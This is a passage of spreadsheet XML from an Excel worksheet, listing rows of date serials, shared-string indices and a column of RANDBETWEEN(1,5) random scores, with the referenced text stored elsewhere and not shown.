        <f t="shared" ca="1" si="12"/>
        <v>1</v>
      </c>
    </row>
    <row r="799" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A799" s="1">
        <v>43544.241620370369</v>
      </c>
      <c r="B799" t="s">
        <v>5</v>
      </c>
      <c r="C799" t="s">
        <v>318</v>
      </c>
      <c r="E799" t="s">
        <v>906</v>
      </c>
      <c r="F799">
        <f t="shared" ca="1" si="12"/>
        <v>1</v>
      </c>
    </row>
    <row r="800" spans="1:6" ht="390" x14ac:dyDescent="0.25">
      <c r="A800" s="1">
        <v>43544.232291666667</v>
      </c>
      <c r="B800" t="s">
        <v>19</v>
      </c>
      <c r="C800" t="s">
        <v>907</v>
      </c>
      <c r="E800" s="2" t="s">
        <v>908</v>
      </c>
      <c r="F800">
        <f t="shared" ca="1" si="12"/>
        <v>3</v>
      </c>
    </row>
    <row r="801" spans="1:6" ht="210" x14ac:dyDescent="0.25">
      <c r="A801" s="1">
        <v>43544.219074074077</v>
      </c>
      <c r="B801" t="s">
        <v>19</v>
      </c>
      <c r="C801" t="s">
        <v>71</v>
      </c>
      <c r="E801" s="2" t="s">
        <v>910</v>
      </c>
      <c r="F801">
        <f t="shared" ca="1" si="12"/>
        <v>4</v>
      </c>
    </row>
    <row r="802" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A802" s="1">
        <v>43544.215856481482</v>
      </c>
      <c r="B802" t="s">
        <v>5</v>
      </c>
      <c r="C802" t="s">
        <v>48</v>
      </c>
      <c r="E802" t="s">
        <v>911</v>
      </c>
      <c r="F802">
        <f t="shared" ca="1" si="12"/>
        <v>1</v>
      </c>
    </row>
    <row r="803" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A803" s="1">
        <v>43544.197048611109</v>
      </c>
      <c r="B803" t="s">
        <v>5</v>
      </c>
      <c r="C803" t="s">
        <v>836</v>
      </c>
      <c r="E803" s="2" t="s">
        <v>912</v>
      </c>
      <c r="F803">
        <f t="shared" ca="1" si="12"/>
        <v>3</v>
      </c>
    </row>
    <row r="804" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A804" s="1">
        <v>43544.169050925928</v>
      </c>
      <c r="B804" t="s">
        <v>5</v>
      </c>
      <c r="C804" t="s">
        <v>124</v>
      </c>
      <c r="E804" s="2" t="s">
        <v>913</v>
      </c>
      <c r="F804">
        <f t="shared" ca="1" si="12"/>
        <v>1</v>
      </c>
    </row>
    <row r="805" spans="1:6" ht="135" x14ac:dyDescent="0.25">
      <c r="A805" s="1">
        <v>43544.155659722222</v>
      </c>
      <c r="B805" t="s">
        <v>5</v>
      </c>
      <c r="C805" t="s">
        <v>41</v>
      </c>
      <c r="E805" s="2" t="s">
        <v>914</v>
      </c>
      <c r="F805">
        <f t="shared" ca="1" si="12"/>
        <v>1</v>
      </c>
    </row>
    <row r="806" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A806" s="1">
        <v>43544.154652777775</v>
      </c>
      <c r="B806" t="s">
        <v>5</v>
      </c>
      <c r="C806" t="s">
        <v>48</v>
      </c>
      <c r="E806" t="s">
        <v>915</v>
      </c>
      <c r="F806">
        <f t="shared" ca="1" si="12"/>
        <v>4</v>
      </c>
    </row>
    <row r="807" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A807" s="1">
        <v>43544.138935185183</v>
      </c>
      <c r="B807" t="s">
        <v>5</v>
      </c>
      <c r="C807" t="s">
        <v>565</v>
      </c>
      <c r="E807">
        <v>3</v>
      </c>
      <c r="F807">
        <f t="shared" ca="1" si="12"/>
        <v>2</v>
      </c>
    </row>
    <row r="808" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A808" s="1">
        <v>43544.137048611112</v>
      </c>
      <c r="B808" t="s">
        <v>5</v>
      </c>
      <c r="C808" t="s">
        <v>776</v>
      </c>
      <c r="E808" t="s">
        <v>916</v>
      </c>
      <c r="F808">
        <f t="shared" ca="1" si="12"/>
        <v>1</v>
      </c>
    </row>
    <row r="809" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A809" s="1">
        <v>43544.076655092591</v>
      </c>
      <c r="B809" t="s">
        <v>5</v>
      </c>
      <c r="C809" t="s">
        <v>10</v>
      </c>
      <c r="D809" t="s">
        <v>94</v>
      </c>
      <c r="E809" s="2" t="s">
        <v>917</v>
      </c>
      <c r="F809">
        <f t="shared" ca="1" si="12"/>
        <v>5</v>
      </c>
    </row>
    <row r="810" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A810" s="1">
        <v>43544.025543981479</v>
      </c>
      <c r="B810" t="s">
        <v>19</v>
      </c>
      <c r="C810" t="s">
        <v>454</v>
      </c>
      <c r="E810" s="2" t="s">
        <v>918</v>
      </c>
      <c r="F810">
        <f t="shared" ca="1" si="12"/>
        <v>4</v>
      </c>
    </row>
    <row r="811" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A811" s="1">
        <v>43544.00141203704</v>
      </c>
      <c r="B811" t="s">
        <v>19</v>
      </c>
      <c r="C811" t="s">
        <v>140</v>
      </c>
      <c r="D811" t="s">
        <v>234</v>
      </c>
      <c r="E811" t="s">
        <v>919</v>
      </c>
      <c r="F811">
        <f t="shared" ca="1" si="12"/>
        <v>2</v>
      </c>
    </row>
    <row r="812" spans="1:6" ht="60" x14ac:dyDescent="0.25">
      <c r="A812" s="1">
        <v>43543.991099537037</v>
      </c>
      <c r="B812" t="s">
        <v>5</v>
      </c>
      <c r="C812" t="s">
        <v>73</v>
      </c>
      <c r="E812" s="2" t="s">
        <v>920</v>
      </c>
      <c r="F812">
        <f t="shared" ca="1" si="12"/>
        <v>5</v>
      </c>
    </row>
    <row r="813" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A813" s="1">
        <v>43543.989756944444</v>
      </c>
      <c r="B813" t="s">
        <v>5</v>
      </c>
      <c r="C813" t="s">
        <v>73</v>
      </c>
      <c r="F813">
        <f t="shared" ca="1" si="12"/>
        <v>4</v>
      </c>
    </row>
    <row r="814" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A814" s="1">
        <v>43543.987673611111</v>
      </c>
      <c r="B814" t="s">
        <v>35</v>
      </c>
      <c r="C814" t="s">
        <v>73</v>
      </c>
      <c r="E814" s="2" t="s">
        <v>921</v>
      </c>
      <c r="F814">
        <f t="shared" ca="1" si="12"/>
        <v>3</v>
      </c>
    </row>
    <row r="815" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A815" s="1">
        <v>43543.974965277775</v>
      </c>
      <c r="B815" t="s">
        <v>13</v>
      </c>
      <c r="C815" t="s">
        <v>139</v>
      </c>
      <c r="E815" t="s">
        <v>922</v>
      </c>
      <c r="F815">
        <f t="shared" ca="1" si="12"/>
        <v>4</v>
      </c>
    </row>
    <row r="816" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A816" s="1">
        <v>43543.968668981484</v>
      </c>
      <c r="B816" t="s">
        <v>13</v>
      </c>
      <c r="C816" t="s">
        <v>139</v>
      </c>
      <c r="D816" t="s">
        <v>312</v>
      </c>
      <c r="E816" t="s">
        <v>923</v>
      </c>
      <c r="F816">
        <f t="shared" ca="1" si="12"/>
        <v>4</v>
      </c>
    </row>
    <row r="817" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A817" s="1">
        <v>43543.953425925924</v>
      </c>
      <c r="B817" t="s">
        <v>13</v>
      </c>
      <c r="C817" t="s">
        <v>118</v>
      </c>
      <c r="E817" s="2" t="s">
        <v>924</v>
      </c>
      <c r="F817">
        <f t="shared" ca="1" si="12"/>
        <v>2</v>
      </c>
    </row>
    <row r="818" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A818" s="1">
        <v>43543.93346064815</v>
      </c>
      <c r="B818" t="s">
        <v>9</v>
      </c>
      <c r="C818" t="s">
        <v>6</v>
      </c>
      <c r="D818" t="s">
        <v>25</v>
      </c>
      <c r="F818">
        <f t="shared" ca="1" si="12"/>
        <v>3</v>
      </c>
    </row>
    <row r="819" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A819" s="1">
        <v>43543.927395833336</v>
      </c>
      <c r="B819" t="s">
        <v>19</v>
      </c>
      <c r="C819" t="s">
        <v>118</v>
      </c>
      <c r="E819" t="s">
        <v>925</v>
      </c>
      <c r="F819">
        <f t="shared" ca="1" si="12"/>
        <v>4</v>
      </c>
    </row>
    <row r="820" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A820" s="1">
        <v>43543.926944444444</v>
      </c>
      <c r="B820" t="s">
        <v>5</v>
      </c>
      <c r="C820" t="s">
        <v>10</v>
      </c>
      <c r="D820" t="s">
        <v>89</v>
      </c>
      <c r="E820" t="s">
        <v>926</v>
      </c>
      <c r="F820">
        <f t="shared" ca="1" si="12"/>
        <v>3</v>
      </c>
    </row>
    <row r="821" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A821" s="1">
        <v>43543.920023148145</v>
      </c>
      <c r="B821" t="s">
        <v>19</v>
      </c>
      <c r="C821" t="s">
        <v>118</v>
      </c>
      <c r="E821" s="2" t="s">
        <v>927</v>
      </c>
      <c r="F821">
        <f t="shared" ca="1" si="12"/>
        <v>1</v>
      </c>
    </row>
    <row r="822" spans="1:6" ht="135" x14ac:dyDescent="0.25">
      <c r="A822" s="1">
        <v>43543.914178240739</v>
      </c>
      <c r="B822" t="s">
        <v>19</v>
      </c>
      <c r="C822" t="s">
        <v>408</v>
      </c>
      <c r="E822" s="2" t="s">
        <v>928</v>
      </c>
      <c r="F822">
        <f t="shared" ca="1" si="12"/>
        <v>3</v>
      </c>
    </row>
    <row r="823" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A823" s="1">
        <v>43543.811898148146</v>
      </c>
      <c r="B823" t="s">
        <v>19</v>
      </c>
      <c r="C823" t="s">
        <v>408</v>
      </c>
      <c r="E823" t="s">
        <v>929</v>
      </c>
      <c r="F823">
        <f t="shared" ca="1" si="12"/>
        <v>1</v>
      </c>
    </row>
    <row r="824" spans="1:6" ht="150" x14ac:dyDescent="0.25">
      <c r="A824" s="1">
        <v>43543.798611111109</v>
      </c>
      <c r="B824" t="s">
        <v>5</v>
      </c>
      <c r="C824" t="s">
        <v>461</v>
      </c>
      <c r="D824" t="s">
        <v>94</v>
      </c>
      <c r="E824" s="2" t="s">
        <v>930</v>
      </c>
      <c r="F824">
        <f t="shared" ca="1" si="12"/>
        <v>5</v>
      </c>
    </row>
    <row r="825" spans="1:6" ht="330" x14ac:dyDescent="0.25">
      <c r="A825" s="1">
        <v>43543.78361111111</v>
      </c>
      <c r="B825" t="s">
        <v>5</v>
      </c>
      <c r="C825" t="s">
        <v>535</v>
      </c>
      <c r="D825" t="s">
        <v>6</v>
      </c>
      <c r="E825" s="2" t="s">
        <v>931</v>
      </c>
      <c r="F825">
        <f t="shared" ca="1" si="12"/>
        <v>3</v>
      </c>
    </row>
    <row r="826" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A826" s="1">
        <v>43543.746469907404</v>
      </c>
      <c r="B826" t="s">
        <v>13</v>
      </c>
      <c r="C826" t="s">
        <v>10</v>
      </c>
      <c r="D826" t="s">
        <v>6</v>
      </c>
      <c r="E826" t="s">
        <v>932</v>
      </c>
      <c r="F826">
        <f t="shared" ca="1" si="12"/>
        <v>1</v>
      </c>
    </row>
    <row r="827" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A827" s="1">
        <v>43543.743750000001</v>
      </c>
      <c r="B827" t="s">
        <v>19</v>
      </c>
      <c r="C827" t="s">
        <v>10</v>
      </c>
      <c r="D827" t="s">
        <v>6</v>
      </c>
      <c r="E827" s="2" t="s">
        <v>933</v>
      </c>
      <c r="F827">
        <f t="shared" ca="1" si="12"/>
        <v>1</v>
      </c>
    </row>
    <row r="828" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A828" s="1">
        <v>43543.736932870372</v>
      </c>
      <c r="B828" t="s">
        <v>19</v>
      </c>
      <c r="C828" t="s">
        <v>10</v>
      </c>
      <c r="D828" t="s">
        <v>6</v>
      </c>
      <c r="E828" t="s">
        <v>934</v>
      </c>
      <c r="F828">
        <f t="shared" ca="1" si="12"/>
        <v>3</v>
      </c>
    </row>
    <row r="829" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A829" s="1">
        <v>43543.733194444445</v>
      </c>
      <c r="B829" t="s">
        <v>19</v>
      </c>
      <c r="C829" t="s">
        <v>6</v>
      </c>
      <c r="D829" t="s">
        <v>25</v>
      </c>
      <c r="E829" t="s">
        <v>935</v>
      </c>
      <c r="F829">
        <f t="shared" ca="1" si="12"/>
        <v>2</v>
      </c>
    </row>
    <row r="830" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A830" s="1">
        <v>43543.733171296299</v>
      </c>
      <c r="B830" t="s">
        <v>19</v>
      </c>
      <c r="C830" t="s">
        <v>6</v>
      </c>
      <c r="D830" t="s">
        <v>25</v>
      </c>
      <c r="E830" t="s">
        <v>935</v>
      </c>
      <c r="F830">
        <f t="shared" ca="1" si="12"/>
        <v>5</v>
      </c>
    </row>
    <row r="831" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A831" s="1">
        <v>43543.724479166667</v>
      </c>
      <c r="B831" t="s">
        <v>13</v>
      </c>
      <c r="C831" t="s">
        <v>10</v>
      </c>
      <c r="D831" t="s">
        <v>6</v>
      </c>
      <c r="E831" t="s">
        <v>936</v>
      </c>
      <c r="F831">
        <f t="shared" ca="1" si="12"/>
        <v>1</v>
      </c>
    </row>
    <row r="832" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A832" s="1">
        <v>43543.713206018518</v>
      </c>
      <c r="B832" t="s">
        <v>19</v>
      </c>
      <c r="C832" t="s">
        <v>6</v>
      </c>
      <c r="D832" t="s">
        <v>25</v>
      </c>
      <c r="E832" t="s">
        <v>32</v>
      </c>
      <c r="F832">
        <f t="shared" ca="1" si="12"/>
        <v>2</v>
      </c>
    </row>
    <row r="833" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A833" s="1">
        <v>43543.700069444443</v>
      </c>
      <c r="B833" t="s">
        <v>5</v>
      </c>
      <c r="C833" t="s">
        <v>6</v>
      </c>
      <c r="D833" t="s">
        <v>25</v>
      </c>
      <c r="E833" t="s">
        <v>32</v>
      </c>
      <c r="F833">
        <f t="shared" ca="1" si="12"/>
        <v>4</v>
      </c>
    </row>
    <row r="834" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A834" s="1">
        <v>43543.698437500003</v>
      </c>
      <c r="B834" t="s">
        <v>19</v>
      </c>
      <c r="C834" t="s">
        <v>10</v>
      </c>
      <c r="D834" t="s">
        <v>89</v>
      </c>
      <c r="E834" t="s">
        <v>937</v>
      </c>
      <c r="F834">
        <f t="shared" ref="F834:F897" ca="1" si="13">RANDBETWEEN(1,5)</f>
        <v>4</v>
      </c>
    </row>
    <row r="835" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A835" s="1">
        <v>43543.678206018521</v>
      </c>
      <c r="B835" t="s">
        <v>19</v>
      </c>
      <c r="C835" t="s">
        <v>10</v>
      </c>
      <c r="D835" t="s">
        <v>6</v>
      </c>
      <c r="E835" t="s">
        <v>938</v>
      </c>
      <c r="F835">
        <f t="shared" ca="1" si="13"/>
        <v>3</v>
      </c>
    </row>
    <row r="836" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A836" s="1">
        <v>43543.673773148148</v>
      </c>
      <c r="B836" t="s">
        <v>5</v>
      </c>
      <c r="C836" t="s">
        <v>260</v>
      </c>
      <c r="E836" t="s">
        <v>939</v>
      </c>
      <c r="F836">
        <f t="shared" ca="1" si="13"/>
        <v>1</v>
      </c>
    </row>
    <row r="837" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A837" s="1">
        <v>43543.65289351852</v>
      </c>
      <c r="B837" t="s">
        <v>19</v>
      </c>
      <c r="C837" t="s">
        <v>10</v>
      </c>
      <c r="D837" t="s">
        <v>89</v>
      </c>
      <c r="E837" t="s">
        <v>940</v>
      </c>
      <c r="F837">
        <f t="shared" ca="1" si="13"/>
        <v>2</v>
      </c>
    </row>
    <row r="838" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A838" s="1">
        <v>43543.623449074075</v>
      </c>
      <c r="B838" t="s">
        <v>5</v>
      </c>
      <c r="C838" t="s">
        <v>10</v>
      </c>
      <c r="D838" t="s">
        <v>11</v>
      </c>
      <c r="E838" t="s">
        <v>941</v>
      </c>
      <c r="F838">
        <f t="shared" ca="1" si="13"/>
        <v>1</v>
      </c>
    </row>
    <row r="839" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A839" s="1">
        <v>43543.604016203702</v>
      </c>
      <c r="B839" t="s">
        <v>22</v>
      </c>
      <c r="C839" t="s">
        <v>41</v>
      </c>
      <c r="E839" t="s">
        <v>942</v>
      </c>
      <c r="F839">
        <f t="shared" ca="1" si="13"/>
        <v>1</v>
      </c>
    </row>
    <row r="840" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A840" s="1">
        <v>43543.600219907406</v>
      </c>
      <c r="B840" t="s">
        <v>5</v>
      </c>
      <c r="C840" t="s">
        <v>6</v>
      </c>
      <c r="D840" t="s">
        <v>25</v>
      </c>
      <c r="E840" t="s">
        <v>943</v>
      </c>
      <c r="F840">
        <f t="shared" ca="1" si="13"/>
        <v>3</v>
      </c>
    </row>
    <row r="841" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A841" s="1">
        <v>43543.585115740738</v>
      </c>
      <c r="B841" t="s">
        <v>5</v>
      </c>
      <c r="C841" t="s">
        <v>10</v>
      </c>
      <c r="D841" t="s">
        <v>36</v>
      </c>
      <c r="E841" s="2" t="s">
        <v>944</v>
      </c>
      <c r="F841">
        <f t="shared" ca="1" si="13"/>
        <v>5</v>
      </c>
    </row>
    <row r="842" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A842" s="1">
        <v>43543.577407407407</v>
      </c>
      <c r="B842" t="s">
        <v>35</v>
      </c>
      <c r="C842" t="s">
        <v>6</v>
      </c>
      <c r="D842" t="s">
        <v>25</v>
      </c>
      <c r="E842" t="s">
        <v>945</v>
      </c>
      <c r="F842">
        <f t="shared" ca="1" si="13"/>
        <v>2</v>
      </c>
    </row>
    <row r="843" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A843" s="1">
        <v>43543.573541666665</v>
      </c>
      <c r="B843" t="s">
        <v>19</v>
      </c>
      <c r="C843" t="s">
        <v>10</v>
      </c>
      <c r="D843" t="s">
        <v>290</v>
      </c>
      <c r="E843" t="s">
        <v>946</v>
      </c>
      <c r="F843">
        <f t="shared" ca="1" si="13"/>
        <v>1</v>
      </c>
    </row>
    <row r="844" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A844" s="1">
        <v>43543.570486111108</v>
      </c>
      <c r="B844" t="s">
        <v>5</v>
      </c>
      <c r="C844" t="s">
        <v>173</v>
      </c>
      <c r="E844" t="s">
        <v>947</v>
      </c>
      <c r="F844">
        <f t="shared" ca="1" si="13"/>
        <v>4</v>
      </c>
    </row>
    <row r="845" spans="1:6" ht="120" x14ac:dyDescent="0.25">
      <c r="A845" s="1">
        <v>43543.568310185183</v>
      </c>
      <c r="B845" t="s">
        <v>13</v>
      </c>
      <c r="C845" t="s">
        <v>65</v>
      </c>
      <c r="E845" s="2" t="s">
        <v>948</v>
      </c>
      <c r="F845">
        <f t="shared" ca="1" si="13"/>
        <v>3</v>
      </c>
    </row>
    <row r="846" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A846" s="1">
        <v>43543.568159722221</v>
      </c>
      <c r="B846" t="s">
        <v>13</v>
      </c>
      <c r="C846" t="s">
        <v>10</v>
      </c>
      <c r="D846" t="s">
        <v>80</v>
      </c>
      <c r="E846" t="s">
        <v>949</v>
      </c>
      <c r="F846">
        <f t="shared" ca="1" si="13"/>
        <v>1</v>
      </c>
    </row>
    <row r="847" spans="1:6" ht="150" x14ac:dyDescent="0.25">
      <c r="A847" s="1">
        <v>43543.545740740738</v>
      </c>
      <c r="B847" t="s">
        <v>5</v>
      </c>
      <c r="C847" t="s">
        <v>10</v>
      </c>
      <c r="D847" t="s">
        <v>89</v>
      </c>
      <c r="E847" s="2" t="s">
        <v>950</v>
      </c>
      <c r="F847">
        <f t="shared" ca="1" si="13"/>
        <v>1</v>
      </c>
    </row>
    <row r="848" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A848" s="1">
        <v>43543.544988425929</v>
      </c>
      <c r="B848" t="s">
        <v>22</v>
      </c>
      <c r="C848" t="s">
        <v>144</v>
      </c>
      <c r="E848" t="s">
        <v>951</v>
      </c>
      <c r="F848">
        <f t="shared" ca="1" si="13"/>
        <v>2</v>
      </c>
    </row>
    <row r="849" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A849" s="1">
        <v>43543.529479166667</v>
      </c>
      <c r="B849" t="s">
        <v>5</v>
      </c>
      <c r="C849" t="s">
        <v>10</v>
      </c>
      <c r="D849" t="s">
        <v>6</v>
      </c>
      <c r="E849" t="s">
        <v>952</v>
      </c>
      <c r="F849">
        <f t="shared" ca="1" si="13"/>
        <v>4</v>
      </c>
    </row>
    <row r="850" spans="1:6" ht="75" x14ac:dyDescent="0.25">
      <c r="A850" s="1">
        <v>43543.514178240737</v>
      </c>
      <c r="B850" t="s">
        <v>19</v>
      </c>
      <c r="C850" t="s">
        <v>10</v>
      </c>
      <c r="D850" t="s">
        <v>46</v>
      </c>
      <c r="E850" s="2" t="s">
        <v>953</v>
      </c>
      <c r="F850">
        <f t="shared" ca="1" si="13"/>
        <v>3</v>
      </c>
    </row>
    <row r="851" spans="1:6" ht="270" x14ac:dyDescent="0.25">
      <c r="A851" s="1">
        <v>43543.511041666665</v>
      </c>
      <c r="B851" t="s">
        <v>13</v>
      </c>
      <c r="C851" t="s">
        <v>48</v>
      </c>
      <c r="E851" s="2" t="s">
        <v>954</v>
      </c>
      <c r="F851">
        <f t="shared" ca="1" si="13"/>
        <v>5</v>
      </c>
    </row>
    <row r="852" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A852" s="1">
        <v>43543.505381944444</v>
      </c>
      <c r="B852" t="s">
        <v>13</v>
      </c>
      <c r="C852" t="s">
        <v>10</v>
      </c>
      <c r="D852" t="s">
        <v>80</v>
      </c>
      <c r="E852" t="s">
        <v>955</v>
      </c>
      <c r="F852">
        <f t="shared" ca="1" si="13"/>
        <v>2</v>
      </c>
    </row>
    <row r="853" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A853" s="1">
        <v>43543.485914351855</v>
      </c>
      <c r="B853" t="s">
        <v>19</v>
      </c>
      <c r="C853" t="s">
        <v>10</v>
      </c>
      <c r="D853" t="s">
        <v>23</v>
      </c>
      <c r="E853" t="s">
        <v>956</v>
      </c>
      <c r="F853">
        <f t="shared" ca="1" si="13"/>
        <v>4</v>
      </c>
    </row>
    <row r="854" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A854" s="1">
        <v>43543.484236111108</v>
      </c>
      <c r="B854" t="s">
        <v>5</v>
      </c>
      <c r="C854" t="s">
        <v>10</v>
      </c>
      <c r="D854" t="s">
        <v>41</v>
      </c>
      <c r="E854" t="s">
        <v>957</v>
      </c>
      <c r="F854">
        <f t="shared" ca="1" si="13"/>
        <v>5</v>
      </c>
    </row>
    <row r="855" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A855" s="1">
        <v>43543.483449074076</v>
      </c>
      <c r="B855" t="s">
        <v>13</v>
      </c>
      <c r="C855" t="s">
        <v>48</v>
      </c>
      <c r="E855" s="2" t="s">
        <v>958</v>
      </c>
      <c r="F855">
        <f t="shared" ca="1" si="13"/>
        <v>4</v>
      </c>
    </row>
    <row r="856" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A856" s="1">
        <v>43543.47084490741</v>
      </c>
      <c r="B856" t="s">
        <v>19</v>
      </c>
      <c r="C856" t="s">
        <v>10</v>
      </c>
      <c r="D856" t="s">
        <v>94</v>
      </c>
      <c r="E856" s="2" t="s">
        <v>959</v>
      </c>
      <c r="F856">
        <f t="shared" ca="1" si="13"/>
        <v>3</v>
      </c>
    </row>
    <row r="857" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A857" s="1">
        <v>43543.456759259258</v>
      </c>
      <c r="B857" t="s">
        <v>19</v>
      </c>
      <c r="C857" t="s">
        <v>10</v>
      </c>
      <c r="D857" t="s">
        <v>330</v>
      </c>
      <c r="E857" t="s">
        <v>960</v>
      </c>
      <c r="F857">
        <f t="shared" ca="1" si="13"/>
        <v>3</v>
      </c>
    </row>
    <row r="858" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A858" s="1">
        <v>43543.456284722219</v>
      </c>
      <c r="B858" t="s">
        <v>19</v>
      </c>
      <c r="C858" t="s">
        <v>48</v>
      </c>
      <c r="E858" s="2" t="s">
        <v>961</v>
      </c>
      <c r="F858">
        <f t="shared" ca="1" si="13"/>
        <v>5</v>
      </c>
    </row>
    <row r="859" spans="1:6" ht="409.5" x14ac:dyDescent="0.25">
      <c r="A859" s="1">
        <v>43543.443472222221</v>
      </c>
      <c r="B859" t="s">
        <v>19</v>
      </c>
      <c r="C859" t="s">
        <v>65</v>
      </c>
      <c r="E859" s="2" t="s">
        <v>962</v>
      </c>
      <c r="F859">
        <f t="shared" ca="1" si="13"/>
        <v>3</v>
      </c>
    </row>
    <row r="860" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A860" s="1">
        <v>43543.434907407405</v>
      </c>
      <c r="B860" t="s">
        <v>13</v>
      </c>
      <c r="C860" t="s">
        <v>10</v>
      </c>
      <c r="D860" t="s">
        <v>20</v>
      </c>
      <c r="E860" t="s">
        <v>963</v>
      </c>
      <c r="F860">
        <f t="shared" ca="1" si="13"/>
        <v>2</v>
      </c>
    </row>
    <row r="861" spans="1:6" ht="105" x14ac:dyDescent="0.25">
      <c r="A861" s="1">
        <v>43543.422835648147</v>
      </c>
      <c r="B861" t="s">
        <v>5</v>
      </c>
      <c r="C861" t="s">
        <v>65</v>
      </c>
      <c r="E861" s="2" t="s">
        <v>964</v>
      </c>
      <c r="F861">
        <f t="shared" ca="1" si="13"/>
        <v>5</v>
      </c>
    </row>
    <row r="862" spans="1:6" ht="45" x14ac:dyDescent="0.25">
      <c r="A862" s="1">
        <v>43543.419733796298</v>
      </c>
      <c r="B862" t="s">
        <v>22</v>
      </c>
      <c r="C862" t="s">
        <v>41</v>
      </c>
      <c r="E862" s="2" t="s">
        <v>965</v>
      </c>
      <c r="F862">
        <f t="shared" ca="1" si="13"/>
        <v>3</v>
      </c>
    </row>
    <row r="863" spans="1:6" ht="195" x14ac:dyDescent="0.25">
      <c r="A863" s="1">
        <v>43543.400659722225</v>
      </c>
      <c r="B863" t="s">
        <v>13</v>
      </c>
      <c r="C863" t="s">
        <v>10</v>
      </c>
      <c r="D863" t="s">
        <v>89</v>
      </c>
      <c r="E863" s="2" t="s">
        <v>966</v>
      </c>
      <c r="F863">
        <f t="shared" ca="1" si="13"/>
        <v>5</v>
      </c>
    </row>
    <row r="864" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A864" s="1">
        <v>43543.39366898148</v>
      </c>
      <c r="B864" t="s">
        <v>13</v>
      </c>
      <c r="C864" t="s">
        <v>6</v>
      </c>
      <c r="D864" t="s">
        <v>25</v>
      </c>
      <c r="E864" t="s">
        <v>967</v>
      </c>
      <c r="F864">
        <f t="shared" ca="1" si="13"/>
        <v>2</v>
      </c>
    </row>
    <row r="865" spans="1:6" ht="409.5" x14ac:dyDescent="0.25">
      <c r="A865" s="1">
        <v>43543.387488425928</v>
      </c>
      <c r="B865" t="s">
        <v>13</v>
      </c>
      <c r="C865" t="s">
        <v>10</v>
      </c>
      <c r="D865" t="s">
        <v>17</v>
      </c>
      <c r="E865" s="2" t="s">
        <v>968</v>
      </c>
      <c r="F865">
        <f t="shared" ca="1" si="13"/>
        <v>5</v>
      </c>
    </row>
    <row r="866" spans="1:6" x14ac:dyDescent="0.25">
      <c r="A866" s="1">
        <v>43543.372256944444</v>
      </c>
      <c r="B866" t="s">
        <v>35</v>
      </c>
      <c r="C866" t="s">
        <v>10</v>
      </c>
      <c r="D866" t="s">
        <v>158</v>
      </c>
      <c r="E866" t="s">
        <v>969</v>
      </c>
      <c r="F866">
        <f t="shared" ca="1" si="13"/>
        <v>5</v>
      </c>
    </row>
    <row r="867" spans="1:6" ht="225" x14ac:dyDescent="0.25">
      <c r="A867" s="1">
        <v>43543.36310185185</v>
      </c>
      <c r="B867" t="s">
        <v>19</v>
      </c>
      <c r="C867" t="s">
        <v>48</v>
      </c>
      <c r="E867" s="2" t="s">
        <v>970</v>
      </c>
      <c r="F867">
        <f t="shared" ca="1" si="13"/>
        <v>2</v>
      </c>
    </row>
    <row r="868" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A868" s="1">
        <v>43543.345520833333</v>
      </c>
      <c r="B868" t="s">
        <v>13</v>
      </c>
      <c r="C868" t="s">
        <v>10</v>
      </c>
      <c r="D868" t="s">
        <v>14</v>
      </c>
      <c r="E868" s="2" t="s">
        <v>971</v>
      </c>
      <c r="F868">
        <f t="shared" ca="1" si="13"/>
        <v>5</v>
      </c>
    </row>
    <row r="869" spans="1:6" ht="30" x14ac:dyDescent="0.25">
      <c r="A869" s="1">
        <v>43543.345497685186</v>
      </c>
      <c r="B869" t="s">
        <v>13</v>
      </c>
      <c r="C869" t="s">
        <v>10</v>
      </c>
      <c r="D869" t="s">
        <v>14</v>
      </c>
      <c r="E869" s="2" t="s">
        <v>971</v>
      </c>
      <c r="F869">
        <f t="shared" ca="1" si="13"/>
        <v>5</v>
      </c>
    </row>
